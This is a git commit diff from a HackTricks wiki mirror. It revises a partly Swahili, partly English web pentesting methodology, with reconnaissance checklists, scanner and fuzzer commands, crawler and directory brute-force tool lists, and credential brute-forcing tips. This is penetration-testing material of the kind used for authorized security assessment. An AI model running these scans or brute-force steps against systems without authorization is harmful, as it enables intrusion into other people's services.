maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/command-injection.md', 'src/network-serv

Browse Source
This commit is contained in:
Translator 2025-08-28 14:24:10 +00:00
parent 7ac2766567
commit ddaec77e19
5 changed files with 300 additions and 181 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -432,6 +432,7 @@
- [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md)
- [IIS - Internet Information Services](network-services-pentesting/pentesting-web/iis-internet-information-services.md)
- [ImageMagick Security](network-services-pentesting/pentesting-web/imagemagick-security.md)
- [Ispconfig](network-services-pentesting/pentesting-web/ispconfig.md)
- [JBOSS](network-services-pentesting/pentesting-web/jboss.md)
- [Jira & Confluence](network-services-pentesting/pentesting-web/jira.md)
- [Joomla](network-services-pentesting/pentesting-web/joomla.md)

273
src/network-services-pentesting/pentesting-web/README.md
View File

@ -2,11 +2,11 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Info
## Habari za Msingi
Huduma ya wavuti ni huduma **ya kawaida na pana zaidi** na aina nyingi za **vulnerabilities tofauti** zipo.
Huduma ya wavuti ni huduma ya **kawaida zaidi na yenye wigo mpana**, na kuna **aina nyingi tofauti za udhaifu**.
**Port ya default:** 80 (HTTP), 443(HTTPS)
**Bandari ya chaguo-msingi:** 80 (HTTP), 443(HTTPS)
```bash
PORT STATE SERVICE
80/tcp open http
@ -26,46 +26,46 @@ web-api-pentesting.md
## Muhtasari wa Mbinu
> Katika mbinu hii tunaenda kudhani kwamba unataka kushambulia kikoa (au subdomain) na tu hicho. Hivyo, unapaswa kutumia mbinu hii kwa kila kikoa, subdomain au IP iliyogunduliwa yenye seva ya wavuti isiyojulikana ndani ya upeo.
> Katika mbinu hii tutadhania kuwa unamshambulia domain (au subdomain) moja tu. Kwa hivyo, unapaswa kutumia mbinu hii kwa kila domain, subdomain au IP iliyogunduliwa ambayo ina web server isiyothibitishwa ndani ya upeo.
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumiwa na seva ya wavuti. Tafuta **hila** za kukumbuka wakati wa mtihani mzima ikiwa utaweza kutambua teknolojia hiyo kwa mafanikio.
- [ ] Je, kuna **udhaifu** wowote unaojulikana wa toleo la teknolojia hiyo?
- [ ] Unatumia **teknolojia maarufu** yoyote? Je, kuna **hila** yoyote ya manufaa ya kupata taarifa zaidi?
- [ ] Je, kuna **scanner maalum** ya kukimbia (kama wpscan)?
- [ ] Anzisha **scanners za matumizi ya jumla**. Hujui kama wataweza kupata kitu au kama wataweza kupata taarifa za kuvutia.
- [ ] Anza na **ukaguzi wa awali**: **robots**, **sitemap**, **404** makosa na **SSL/TLS scan** (ikiwa HTTPS).
- [ ] Anza **kupeleleza** ukurasa wa wavuti: Ni wakati wa **kupata** faili, folda na **parameta** zote zinazotumika. Pia, angalia kwa **matokeo maalum**.
- [ ] _Kumbuka kwamba kila wakati directory mpya inagunduliwa wakati wa brute-forcing au kupeleleza, inapaswa kupelelezwa._
- [ ] **Brute-Forcing ya Directory**: Jaribu kujaribu nguvu zote za folda zilizogunduliwa kutafuta **faili** na **directories** mpya.
- [ ] _Kumbuka kwamba kila wakati directory mpya inagunduliwa wakati wa brute-forcing au kupeleleza, inapaswa kujaribiwa kwa nguvu._
- [ ] **Ukaguzi wa Nakala**: Jaribu kuona kama unaweza kupata **nakala** za **faili zilizogunduliwa** kwa kuongeza nyongeza za kawaida za nakala.
- [ ] **Brute-Force parameta**: Jaribu **kupata parameta zilizofichwa**.
- [ ] Mara tu unapokuwa umeshatambua **endpoints** zote zinazokubali **ingizo la mtumiaji**, angalia aina zote za **udhaifu** zinazohusiana na hiyo.
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumiwa na web server. Tafuta **mbinu** za kuzingatia wakati wa mtihani wa baadaye ikiwa utaweza kutambua tech kwa ufanisi.
- [ ] Kuna **known vulnerability** yoyote ya toleo la teknolojia?
- [ ] Unatumia **well known tech** yoyote? Kuna **useful trick** yoyote ya kupata taarifa zaidi?
- [ ] Kuna **specialised scanner** ya kuendesha (kama wpscan)?
- [ ] Anzisha **general purposes scanners**. Hujui kama zitatokea kitu au kama zitatoka taarifa za kuvutia.
- [ ] Anza na **initial checks**: **robots**, **sitemap**, **404** error na **SSL/TLS scan** (ikiwa HTTPS).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** faili zote zinazowezekana, **folders** na **parameters being used.** Pia, angalia kwa **special findings**.
- [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be spidered._
- [ ] **Directory Brute-Forcing**: Jaribu ku-brute force folda zote zilizogunduliwa ukitafuta faili mpya na directory mpya.
- [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
- [ ] **Backups checking**: Jaribu kuona kama unaweza kupata **backups** za **discovered files** ukiongeza extensions za kawaida za backup.
- [ ] **Brute-Force parameters**: Jaribu **kutafuta hidden parameters**.
- [ ] Mara utakapokuwa ume**identified** endpoints zote zinazowezekana zinazokubali **user input**, angalia aina zote za **vulnerabilities** zinazohusiana nazo.
- [ ] [Fuata orodha hii ya ukaguzi](../../pentesting-web/web-vulnerabilities-methodology.md)
## Toleo la Seva (Lina Udhihirisho?)
## Toleo la Server (Je, lina udhaifu?)
### Tambua
Angalia kama kuna **udhaifu unaojulikana** kwa **toleo** la seva linalotumika.\
**Vichwa vya HTTP na vidakuzi vya jibu** vinaweza kuwa na manufaa sana katika **kutambua** **teknolojia** na/au **toleo** linalotumika. **Nmap scan** inaweza kutambua toleo la seva, lakini pia inaweza kuwa na manufaa kutumia zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)au [**https://builtwith.com/**](https://builtwith.com)**:**
Angalia kama kuna **known vulnerabilities** kwa server **toleo** linaloendesha.\
**HTTP headers and cookies of the response** zinaweza kuwa muhimu sana kutambua **teknolojia** na/au **toleo** linalotumika. **Nmap scan** inaweza kubaini server toleo, lakini pia zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)au [**https://builtwith.com/**](https://builtwith.com)**:**
```bash
whatweb -a 1 <URL> #Stealthy
whatweb -a 3 <URL> #Aggresive
webtech -u <URL>
webanalyze -host https://google.com -crawl 2
```
Search **for** [**vulnerabilities of the web application** **version**](../../generic-hacking/search-exploits.md)
Tafuta **for** [**vulnerabilities of the web application** **version**](../../generic-hacking/search-exploits.md)
### **Check if any WAF**
### **Angalia kama kuna WAF**
- [**https://github.com/EnableSecurity/wafw00f**](https://github.com/EnableSecurity/wafw00f)
- [**https://github.com/Ekultek/WhatWaf.git**](https://github.com/Ekultek/WhatWaf.git)
- [**https://nmap.org/nsedoc/scripts/http-waf-detect.html**](https://nmap.org/nsedoc/scripts/http-waf-detect.html)
### Web tech tricks
### Mbinu za teknolojia za wavuti
Baadhi ya **tricks** za **finding vulnerabilities** katika **technologies** maarufu zinazotumika:
Baadhi ya **tricks** za **finding vulnerabilities** katika teknolojia mbalimbali zinazojulikana zinazotumika:
- [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)
- [**Apache**](apache.md)
@ -78,6 +78,7 @@ Baadhi ya **tricks** za **finding vulnerabilities** katika **technologies** maar
- [**Golang**](golang.md)
- [**GraphQL**](graphql.md)
- [**H2 - Java SQL database**](h2-java-sql-database.md)
- [**ISPConfig**](ispconfig.md)
- [**IIS tricks**](iis-internet-information-services.md)
- [**Microsoft SharePoint**](microsoft-sharepoint.md)
- [**JBOSS**](jboss.md)
@ -100,28 +101,28 @@ Baadhi ya **tricks** za **finding vulnerabilities** katika **technologies** maar
- [**Wordpress**](wordpress.md)
- [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/index.html)
_Kumbuka kwamba **domain** hiyo hiyo inaweza kuwa inatumia **technologies** tofauti katika **ports**, **folders** na **subdomains**._\
Ikiwa programu ya wavuti inatumia **tech/platform** maarufu iliyoorodheshwa hapo juu au **zingine yoyote**, usisahau **kutafuta mtandaoni** tricks mpya (na unijulishe!).
_Kumbuka kwamba the **same domain** inaweza kutumia **different technologies** katika tofauti **ports**, **folders** na **subdomains**._\
Kama web application inatumia **tech/platform listed before** au **any other**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).
### Source Code Review
### Mapitio ya Source Code
Ikiwa **source code** ya programu inapatikana katika **github**, mbali na kufanya **mtihani wa White box** wa programu hiyo kuna **maelezo** ambayo yanaweza kuwa **muhimu** kwa **Black-Box testing** ya sasa:
Ikiwa **source code** ya application inapatikana kwenye **github**, mbali na wewe kufanya mwenyewe **White box test** ya application, kuna **some information** ambazo zinaweza kuwa **useful** kwa **Black-Box testing** inayofanywa sasa:
- Je, kuna **Change-log au Readme au Version** file au chochote chenye **version info accessible** kupitia wavuti?
- Je, **credentials** zimehifadhiwaje na wapi? Je, kuna **file** (inayopatikana?) yenye credentials (majina ya watumiaji au nywila)?
- Je, **nywila** ziko katika **plain text**, **encrypted** au ni **hashing algorithm** gani inatumika?
- Je, inatumia **master key** yoyote kwa ajili ya kuandika kitu? Ni **algorithm** gani inatumika?
- Je, unaweza **kufikia yoyote ya hizi files** kwa kutumia udhaifu wowote?
- Je, kuna **maelezo ya kuvutia katika github** (masuala yaliyotatuliwa na yasiyotatuliwa) **issues**? Au katika **commit history** (labda **nywila iliyoingizwa ndani ya commit ya zamani**)?
- Je, kuna **Change-log or Readme or Version** file au kitu chochote chenye **version info accessible** via web?
- Je, **credentials** zimehifadhiwa vipi na wapi? Kuna (inayopatikana?) **file** yenye credentials (usernames au passwords)?
- Je, **passwords** ziko kwa **plain text**, **encrypted** au ni gani **hashing algorithm** inayotumika?
- Je, inatumia **master key** kwa ku-encrypt kitu? Ni **algorithm** gani inayotumika?
- Je, unaweza **access any of these files** kwa kutumia vulnerability fulani?
- Je, kuna **interesting information in the github** (solved and not solved) **issues**? Au katika **commit history** (labda some **password introduced inside an old commit**)?
{{#ref}}
code-review-tools.md
{{#endref}}
### Automatic scanners
### Skana za otomatiki
#### General purpose automatic scanners
#### Skana za otomatiki za madhumuni ya jumla
```bash
nikto -h <URL>
whatweb -a 4 <URL>
@ -133,12 +134,12 @@ nuclei -ut && nuclei -target <URL>
# https://github.com/ignis-sec/puff (client side vulns fuzzer)
node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi2rVUN/?query=FUZZ"
```
#### CMS scanners
#### Vichunguzi vya CMS
Ikiwa CMS inatumika usisahau **kufanya skana**, labda kitu cha kuvutia kitatokea:
Ikiwa CMS inatumiwa usisahau **kuendesha skana**, labda utapata kitu kitamu:
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/index.html)**, Railo, Axis2, Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** tovuti za masuala ya Usalama. (GUI)\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** tovuti kwa masuala ya usalama. (GUI)\
[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/index.html)**, PrestaShop, Opencart**\
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/index.html) **au** [**(M)oodle**](moodle.md)\
[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/index.html)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
@ -148,45 +149,45 @@ wpscan --force update -e --url <URL>
joomscan --ec -u <URL>
joomlavs.rb #https://github.com/rastating/joomlavs
```
> Katika hatua hii unapaswa kuwa na taarifa fulani kuhusu seva ya wavuti inayotumiwa na mteja (ikiwa kuna data yoyote iliyotolewa) na mbinu fulani za kukumbuka wakati wa mtihani. Ikiwa una bahati umepata hata CMS na kuendesha skana.
> Kwa hatua hii unapaswa tayari kuwa na baadhi ya taarifa za web server inayotumiwa na mteja (ikiwa data yoyote imetolewa) na baadhi ya mbinu za kuzingatia wakati wa mtihani. Ikiwa una bahati umebaini hata CMS na kukimbia scanner.
## Ugunduzi wa Programu za Wavuti Hatua kwa Hatua
## Hatua kwa hatua za ugunduzi wa Web Application
> Kutoka hapa tutaanza kuingiliana na programu ya wavuti.
> Kuanzia sasa tutaanza kuingiliana na web application.
### Ukaguzi wa Awali
### Uchunguzi wa awali
**Kurasa za Kawaida zenye taarifa za kuvutia:**
**Kurasa za default zenye taarifa za kuvutia:**
- /robots.txt
- /sitemap.xml
- /crossdomain.xml
- /clientaccesspolicy.xml
- /.well-known/
- Angalia pia maoni katika kurasa kuu na za sekondari.
- Angalia pia maoni kwenye kurasa kuu na za pili.
**Kusababisha makosa**
**Kulazimisha makosa**
Seva za wavuti zinaweza **kufanya kazi kwa njia isiyo ya kawaida** wakati data ya ajabu inatumwa kwao. Hii inaweza kufungua **vulnerabilities** au **kufichua taarifa nyeti**.
Web servers zinaweza **kutenda kinyume cha kawaida** wakati data ya kushangaza inapotumwa kwao. Hii inaweza kufungua **vulnerabilities** au kusababisha **disclosure** ya taarifa nyeti.
- Fikia **kurasa za uwongo** kama /whatever_fake.php (.aspx,.html,.n.k)
- **Ongeza "\[]", "]]", na "\[\["** katika **maadili ya cookie** na **maadili ya parameter** ili kuunda makosa
- Tengeneza kosa kwa kutoa input kama **`/~randomthing/%s`** kwenye **mwisho** wa **URL**
- Jaribu **HTTP Verbs tofauti** kama PATCH, DEBUG au makosa kama FAKE
- Access **fake pages** like /whatever_fake.php (.aspx,.html,.etc)
- **Add "\[]", "]]", and "\[\["** in **cookie values** and **parameter** values to create errors
- Generate error by giving input as **`/~randomthing/%s`** at the **end** of **URL**
- Try **different HTTP Verbs** like PATCH, DEBUG or wrong like FAKE
#### **Angalia kama unaweza kupakia faili (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
#### **Check if you can upload files (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
Ikiwa unapata kuwa **WebDav** ime **wezeshwa** lakini huna ruhusa ya kutosha kwa **kupakia faili** kwenye folda ya mizizi jaribu:
If you find that **WebDav** is **enabled** but you don't have enough permissions for **uploading files** in the root folder try to:
- **Brute Force** akreditif
- **Pakia faili** kupitia WebDav kwenye **sehemu** za **folda zilizopatikana** ndani ya ukurasa wa wavuti. Unaweza kuwa na ruhusa za kupakia faili katika folda nyingine.
- **Brute Force** credentials
- **Upload files** via WebDav to the **rest** of **found folders** inside the web page. You may have permissions to upload files in other folders.
### **Vulnerabilities za SSL/TLS**
### **SSL/TLS vulnerabilites**
- Ikiwa programu **haiwalazimishi watumiaji kutumia HTTPS** katika sehemu yoyote, basi ni **vulnerable to MitM**
- Ikiwa programu inatumia **kutuma data nyeti (nywila) kwa kutumia HTTP**. Basi ni vulnerability kubwa.
- If the application **isn't forcing the user of HTTPS** in any part, then it's **vulnerable to MitM**
- If the application is **sending sensitive data (passwords) using HTTP**. Then it's a high vulnerability.
Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kuangalia **vulnerabilities** (Katika programu za Bug Bounty labda aina hizi za vulnerabilities hazitakubaliwa) na tumia [**a2sv** ](https://github.com/hahwul/a2sv)kuangalia tena vulnerabilities:
Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vulnerabilities** (In Bug Bounty programs probably these kind of vulnerabilities won't be accepted) and use [**a2sv** ](https://github.com/hahwul/a2sv)to recheck the vulnerabilities:
```bash
./testssl.sh [--htmlfile] 10.10.10.10:443
#Use the --htmlfile to save the output inside an htmlfile also
@ -195,60 +196,60 @@ Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kuangalia **vulne
sslscan <host:port>
sslyze --regular <ip:port>
```
Habari kuhusu SSL/TLS udhaifu:
Information about SSL/TLS vulnerabilities:
- [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/)
- [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/)
### Spidering
Zindua aina fulani ya **spider** ndani ya wavuti. Lengo la spider ni **kupata njia nyingi kadri iwezekanavyo** kutoka kwa programu iliyojaribiwa. Kwa hivyo, kuvinjari wavuti na vyanzo vya nje vinapaswa kutumika ili kupata njia halali nyingi kadri iwezekanavyo.
Anzisha aina fulani ya **spider** ndani ya wavuti. Lengo la spider ni **kupata njia nyingi iwezekanavyo** kutoka kwa application inayojaribiwa. Kwa hiyo, web crawling na vyanzo vya nje vinapaswa kutumika ili kupata njia nyingi halali iwezekanavyo.
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder katika faili za JS na vyanzo vya nje (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com).
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, na LinkFider kwa faili za JS na Archive.org kama chanzo cha nje.
- [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, pia inaonyesha "faili za juicy".
- [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. Pia inatafuta katika Archive.org
- [**meg**](https://github.com/tomnomnom/meg) (go): Chombo hiki si spider lakini kinaweza kuwa na manufaa. Unaweza tu kuashiria faili yenye mwenyeji na faili yenye njia na meg itachukua kila njia kwenye kila mwenyeji na kuhifadhi jibu.
- [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider yenye uwezo wa kuunda JS. Hata hivyo, inaonekana haijatunzwa, toleo lililotengenezwa awali ni la zamani na msimbo wa sasa haujajitengeneza.
- [**gau**](https://github.com/lc/gau) (go): HTML spider inayotumia watoa huduma wa nje (wayback, otx, commoncrawl)
- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): Hii ni script itakayopata URLs zenye parameta na kuziorodhesha.
- [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spider yenye uwezo wa kuunda JS.
- [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spider, yenye uwezo wa kuboresha JS inayoweza kutafuta njia mpya katika faili za JS. Inaweza kuwa na manufaa pia kuangalia [JSScanner](https://github.com/dark-warlord14/JSScanner), ambayo ni wrapper ya LinkFinder.
- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): Kutolewa kwa mwisho katika chanzo cha HTML na faili za javascript zilizojumuishwa. Inafaida kwa wawindaji wa makosa, red teamers, infosec ninjas.
- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): Script ya python 2.7 inayotumia Tornado na JSBeautifier kuchambua URLs zinazohusiana kutoka kwa faili za JavaScript. Inafaida kwa kugundua maombi ya AJAX kwa urahisi. Inaonekana haijatunzwa.
- [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Iwapo kuna faili (HTML) itatoa URLs kutoka kwake kwa kutumia kanuni nzuri za kawaida ili kupata na kutoa URLs zinazohusiana kutoka kwa faili mbaya (minify).
- [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, zana kadhaa): Kusanya habari za kuvutia kutoka kwa faili za JS kwa kutumia zana kadhaa.
- [**subjs**](https://github.com/lc/subjs) (go): Pata faili za JS.
- [**page-fetch**](https://github.com/detectify/page-fetch) (go): Pata ukurasa katika kivinjari kisichokuwa na kichwa na uchapishe URLs zote zilizopakiwa ili kupakia ukurasa.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Chombo cha kugundua maudhui kinachochanganya chaguzi kadhaa za zana zilizotangulia.
- [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): Kiendelezi cha Burp kutafuta njia na parameta katika faili za JS.
- [**Sourcemapper**](https://github.com/denandz/sourcemapper): Chombo ambacho kwa URL ya .js.map kitakupa msimbo wa JS ulioimarishwa.
- [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): Hii ni chombo kinachotumika kugundua mwisho kwa lengo fulani.
- [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Gundua viungo kutoka kwa mashine ya wayback (pia kupakua majibu katika wayback na kutafuta viungo zaidi).
- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Vinjari (hata kwa kujaza fomu) na pia pata habari nyeti kwa kutumia regex maalum.
- [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite ni GUI ya hali ya juu ya usalama wa wavuti iliyoundwa kwa wataalamu wa usalama wa mtandao.
- [**jsluice**](https://github.com/BishopFox/jsluice) (go): Ni pakiti ya Go na [chombo cha amri](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) kwa kutolewa kwa URLs, njia, siri, na data nyingine za kuvutia kutoka kwa msimbo wa chanzo wa JavaScript.
- [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge ni kiendelezi rahisi cha **Burp Suite** kutolewa **parameta na mwisho** kutoka kwa ombi ili kuunda orodha ya maneno ya kawaida kwa fuzzing na orodha.
- [**katana**](https://github.com/projectdiscovery/katana) (go): Chombo bora kwa hili.
- [**Crawley**](https://github.com/s0rg/crawley) (go): Chapisha kila kiungo kinachoweza kupatikana.
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com).
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files and Archive.org as external source.
- [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, also indicates "juicy files".
- [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. It also searches in Archive.org
- [**meg**](https://github.com/tomnomnom/meg) (go): This tool isn't a spider but it can be useful. You can just indicate a file with hosts and a file with paths and meg will fetch each path on each host and save the response.
- [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider with JS rendering capabilities. However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile
- [**gau**](https://github.com/lc/gau) (go): HTML spider that uses external providers (wayback, otx, commoncrawl)
- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.
- [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spider with JS rendering capabilities.
- [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spider, with JS beautify capabilities capable of search new paths in JS files. It could be worth it also take a look to [JSScanner](https://github.com/dark-warlord14/JSScanner), which is a wrapper of LinkFinder.
- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): To extract endpoints in both HTML source and embedded javascript files. Useful for bug hunters, red teamers, infosec ninjas.
- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests. Looks like unmaintained.
- [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Given a file (HTML) it will extract URLs from it using nifty regular expression to find and extract the relative URLs from ugly (minify) files.
- [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, several tools): Gather interesting information from JS files using several tools.
- [**subjs**](https://github.com/lc/subjs) (go): Find JS files.
- [**page-fetch**](https://github.com/detectify/page-fetch) (go): Load a page in a headless browser and print out all the urls loaded to load the page.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Content discovery tool mixing several options of the previous tools
- [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): A Burp extension to find path and params in JS files.
- [**Sourcemapper**](https://github.com/denandz/sourcemapper): A tool that given the .js.map URL will get you the beatified JS code
- [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): This is a tool used to discover endpoints for a given target.
- [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Discover links from the wayback machine (also downloading the responses in the wayback and looking for more links
- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
- [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
- [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
- [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge is a simple **Burp Suite extension** to **extract the paramters and endpoints** from the request to create custom wordlist for fuzzing and enumeration.
- [**katana**](https://github.com/projectdiscovery/katana) (go): Awesome tool for this.
- [**Crawley**](https://github.com/s0rg/crawley) (go): Print every link it's able to find.
### Brute Force directories and files
Anza **brute-forcing** kutoka kwenye folda ya mzizi na uhakikishe unafanya brute-force **zote** **directories zilizopatikana** kwa kutumia **hii mbinu** na zote **directories zilizogunduliwa** na **Spidering** (unaweza kufanya brute-forcing hii **kikamilifu** na kuongeza mwanzoni mwa orodha ya maneno iliyotumika majina ya directories zilizopatikana).\
Zana:
Anza **brute-forcing** kutoka kwenye folda ya root na hakikisha unafanya **brute-force** kwa **direktori zote zilizopatikana** ukitumia **hii method** na direktorisi zote **zilizoonekana** kwa **Spidering** (unaweza kufanya brute-forcing **kikamilifu** na kuongeza mwanzoni mwa wordlist iliyotumika majina ya direktorisi zilizopatikana).\
Tools:
- **Dirb** / **Dirbuster** - Imejumuishwa katika Kali, **ya zamani** (na **pole**) lakini inafanya kazi. Inaruhusu vyeti vilivyojitiisha na utafutaji wa kurudiwa. Pole sana ikilinganishwa na chaguzi nyingine.
- [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: Haina ruhusa vyeti vilivyojitiisha lakini** inaruhusu utafutaji wa kurudiwa.
- [**Gobuster**](https://github.com/OJ/gobuster) (go): Inaruhusu vyeti vilivyojitiisha, **haina** **recursive** search.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Haraka, inasaidia utafutaji wa kurudiwa.**
- **Dirb** / **Dirbuster** - Included in Kali, **old** (and **slow**) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options.
- [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: It doesn't allow auto-signed certificates but** allows recursive search.
- [**Gobuster**](https://github.com/OJ/gobuster) (go): It allows auto-signed certificates, it **doesn't** have **recursive** search.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.**
- [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
- [**ffuf** ](https://github.com/ffuf/ffuf)- Haraka: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
- [**uro**](https://github.com/s0md3v/uro) (python): Hii si spider lakini ni chombo ambacho kwa orodha ya URLs zilizopatikana itafuta "URLs zilizojirudia".
- [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Kiendelezi cha Burp kuunda orodha ya directories kutoka kwa historia ya burp ya kurasa tofauti.
- [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Ondoa URLs zenye kazi zilizojirudia (kulingana na uagizaji wa js).
- [**Chamaleon**](https://github.com/iustin24/chameleon): Inatumia wapalyzer kugundua teknolojia zinazotumika na kuchagua orodha za maneno za kutumia.
- [**ffuf** ](https://github.com/ffuf/ffuf)- Fast: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
- [**uro**](https://github.com/s0md3v/uro) (python): This isn't a spider but a tool that given the list of found URLs will to delete "duplicated" URLs.
- [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Burp Extension to create a list of directories from the burp history of different pages
- [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Remove URLs with duplicated functionalities (based on js imports)
- [**Chamaleon**](https://github.com/iustin24/chameleon): It uses wapalyzer to detect used technologies and select the wordlists to use.
**Orodha zinazopendekezwa:**
**Recommended dictionaries:**
- [https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt)
- [**Dirsearch** included dictionary](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt)
@ -267,81 +268,83 @@ Zana:
- _/usr/share/wordlists/dirb/big.txt_
- _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
_Kumbuka kwamba kila wakati directory mpya inapatikana wakati wa brute-forcing au spidering, inapaswa kufanywa Brute-Forced._
_Kumbuka kwamba kila wakati direktorisi mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kufanyiwa Brute-Forced._
### Nini cha kuangalia kwenye kila faili iliyopatikana
### What to check on each file found
- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Pata viungo vilivyovunjika ndani ya HTMLs ambavyo vinaweza kuwa na uwezekano wa kuchukuliwa.
